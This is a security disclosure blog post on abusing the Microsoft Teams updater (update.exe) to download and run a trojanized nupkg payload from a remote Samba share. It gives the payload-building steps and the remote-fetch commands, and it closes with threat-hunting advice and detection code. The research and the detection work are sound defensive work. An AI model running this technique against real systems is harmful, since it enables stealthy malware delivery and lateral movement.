
Microsoft Teams Updater Living off the Land

Introduction

During the global COVID-19 pandemic, the use of video conferencing solutions has increased, and Trustwave SpiderLabs is exercising extra vigilance in monitoring video conferencing traffic. During our threat hunt, we observed a lot of Microsoft Teams updater traffic. Because this traffic is so noisy, malicious traffic hiding in it could evade an analyst's view, or the updater could even be added to a list of allowed, and therefore unmonitored, applications.

Because of this, I reviewed the previous findings on Microsoft Teams code execution and found that the issue was fixed, but not completely.

Observations

My original finding allowed a malicious actor to use the MS Teams Updater to download any binary or payload they wished. This technique is typically known as Living Off the Land and is especially dangerous, as it uses known, common software to download malware.

The patch previously provided for Teams was to restrict its ability to update via a URL. Instead, the updater allows local connections via a share or local folder for product updates.

Initially, when I observed this finding, I figured it could still be used as a technique for lateral movement; however, I found that the added limitations could easily be bypassed by pointing the updater to a remote SMB share.

Legitimate Events:

%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacted>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacted>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update \\fileshare\<redacted>\AppData\Roaming\Microsoft\Teams\DownloadedUpdate
%localappdata%\Microsoft\Teams\update.exe --update

Current Patch

As per the patch, the Microsoft Teams Updater allows only local network paths as update sources. It detects the strings "http/s", ":" and "/" and any port number in the updater URL, blocks the update, and logs the activity under %localappdata%\Microsoft\Teams\SquirrelSetup.log.

[Figure: Patch]

It allows share access in the local UNC format: \\server\

To exploit this, an attacker would need to:

  1. Get the file inside the network, in an open shared folder
  2. Access the payload from that share on the victim machine

It looks like a complicated scenario and there’s a long road to travel, but we can make it work.

Remote Samba

To reduce the attack steps, an attacker can create a remote rather than local share. This would allow them to download the remote payload and execute rather than trying to get the payload to a local share as an intermediary step.

I did some research on Samba and configured a Samba server for remote, public access. After a successful setup, I initiated the command, and the Microsoft Teams Updater "Update.exe" downloaded the remote payload and executed it directly.

Command: Update.exe --update=\\remoteserver\payloadFolder

Vulnerable Endpoint

%localappdata%/Microsoft/Teams/update.exe

Offensive Part

To exploit this, a payload that supports the updater framework must be crafted first.

Payload creation:

  1. Extract any nupkg package; in my example, Teams-1.3.00.27559-full.nupkg
    1. Go to %localappdata%/Microsoft/Teams/packages to pick the Microsoft Teams pre-built package
  2. Go to Teams-1.3.00.27559-full\lib\net45, drop your shellcode as 'squirrel.exe', and compress the complete folder as 'Teams-1.3.00.27559-full.nupkg'
  3. Calculate the metadata with the command:
    sha1sum Teams-1.3.00.27559-full.nupkg && wc -c < Teams-1.3.00.27559-full.nupkg

    resulting in the output:
    fa8b87f0b995498a6e890c832dcaf968997608d4 Teams-1.3.00.27559-full.nupkg 4695

  4. Create a file named RELEASES, copy the above output into it and save.
  5. The result will be a main directory containing two files: Teams-1.3.00.27559-full.nupkg and RELEASES.
  6. Upload those two files to the remote Samba server:

[Figure: Payload]

Requirement:

Since it is a Samba server, the server first needs to be authenticated to from the Windows "Run" dialog.

Steps to Reproduce:

  1. Go to the target application folder "%localappdata%/Microsoft/Teams/" on the victim system
  2. Run the command below:
    update.exe --update=[Samba server containing the above 2 files]
    e.g. update.exe --update=\\remoteserver\payloadFolder

After some seconds (wait 10-15 seconds), the payload will be downloaded successfully and executed by Microsoft Teams.

Affected parameters:

update.exe --update=\\remoteserver\payloadFolder
update.exe --updateRollback=\\remoteserver\payloadFolder

Exploitation Flow:

[Figure: Process flow]

Proof of concept: [Figure]

Impact:

  • The Microsoft Teams Update.exe binary would act as a LOLBin (Living off the Land binary)
  • Since the installation is in the local user AppData folder, no privileged access is needed
  • Attackers can use this to masquerade their traffic (especially for lateral movement)

Trustwave did reach out to Microsoft on this issue and they responded saying:

“Thank you again for submitting this issue to Microsoft. We determined that this behavior is considered to be by design as "we cannot restrict SMB source for --update because we have customers that apparently rely on this (e.g. folder redirection)."”

Trustwave Recommendations

From the threat hunting perspective

  1. Utilize EDR solutions and look at "update.exe" command lines for suspicious connections
  2. Hunt for squirrel.exe executables and investigate the file size; you can use that to differentiate trojanized squirrels from the legitimate squirrel.exe
    • If you are dealing with the Microsoft Teams “update.exe”, validate the size and hash and hunt for any anomalies
  3. Investigate outgoing SMB connections, especially from the Microsoft Teams updater update.exe, or filter SMB connections entirely at the perimeter if they are unnecessary
  4. Ask the customer or IT about any security exclusions placed on Microsoft Teams packages and review the changes applied
  5. IT should install Microsoft Teams under the "Program Files" folder so an attacker cannot drop and execute a remote payload; this can be carried out by Group Policy
  6. Disable any kind of update mechanism and set a policy that updates should be pushed only by the IT team
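As an added example (not part of the original post) of recommendations 1, 3 and 5, the following Python triages Sysmon-style process-creation events for update.exe: it parses both affected parameters, flags --update/--updateRollback sources that are not UNC paths to an approved file server, and notes when the updater runs from user-writable AppData. The sample events, the approved server name "fileshare" and the IP address are constructed assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (not from the original post).
SAMPLE_EVENTS = [
    {"image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\update.exe",
     "cmdline": r"update.exe --update \\fileshare\alice\AppData\Roaming\Microsoft\Teams\DownloadedUpdate"},
    {"image": r"C:\Users\alice\AppData\Local\Microsoft\Teams\update.exe",
     "cmdline": r"update.exe --update"},
    {"image": r"C:\Users\bob\AppData\Local\Microsoft\Teams\update.exe",
     "cmdline": r"update.exe --update=\\203.0.113.7\payloadFolder"},
    {"image": r"C:\Users\bob\AppData\Local\Microsoft\Teams\update.exe",
     "cmdline": r"update.exe --updateRollback=\\evil-share.example\pkg"},
    {"image": r"C:\Program Files\Teams\update.exe",
     "cmdline": r"update.exe --update=\\fileshare\teams\DownloadedUpdate"},
]

# Assumption: the organization's known Teams update file server(s), lower-case host names.
APPROVED_SERVERS = {"fileshare"}

UPDATE_ARG = re.compile(r"--(update|updateRollback)(?:=|\s+)(\S+)", re.IGNORECASE)  # "--update X" or "--update=X"
UNC_PATH = re.compile(r"^\\\\([^\\]+)\\")  # \\server\share...
IPV4 = re.compile(r"\d{1,3}(\.\d{1,3}){3}")


def triage_event(event):
    """Return the reasons this update.exe event deserves a look (empty list = benign)."""
    reasons = []
    if not event["image"].lower().endswith(r"\teams\update.exe"):
        return reasons  # not the Teams updater at all
    m = UPDATE_ARG.search(event["cmdline"])
    if not m:
        return reasons  # bare "--update" with no source: the normal self-update case
    flag, source = m.group(1), m.group(2)
    unc = UNC_PATH.match(source)
    if unc:
        server = unc.group(1).lower()
        if server not in APPROVED_SERVERS:
            reasons.append(f"--{flag} points at unapproved SMB server {server}")
        if IPV4.fullmatch(server):
            reasons.append("update source is a raw IP address")
    else:
        reasons.append(f"--{flag} source is not a UNC path: {source}")
    # Recommendation 5: an updater living in user-writable AppData is easier to abuse.
    if reasons and "\\appdata\\local\\" in event["image"].lower():
        reasons.append("updater runs from user-writable AppData, not Program Files")
    return reasons


def triage(events):
    """Map each command line to its findings; only non-empty lists need analyst review."""
    return {e["cmdline"]: triage_event(e) for e in events}
```

The two legitimate command lines from the "Legitimate Events" section above (an approved server, and a bare --update) come back clean, while the two constructed remote-share events are flagged.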

Trustwave is exercising extra vigilance in monitoring this kind of traffic. We regularly monitor and improve our threat hunting plans for all global cyber events and all organizations can undertake similar operations within their environment. Contact Trustwave about engaging professional threat hunting.
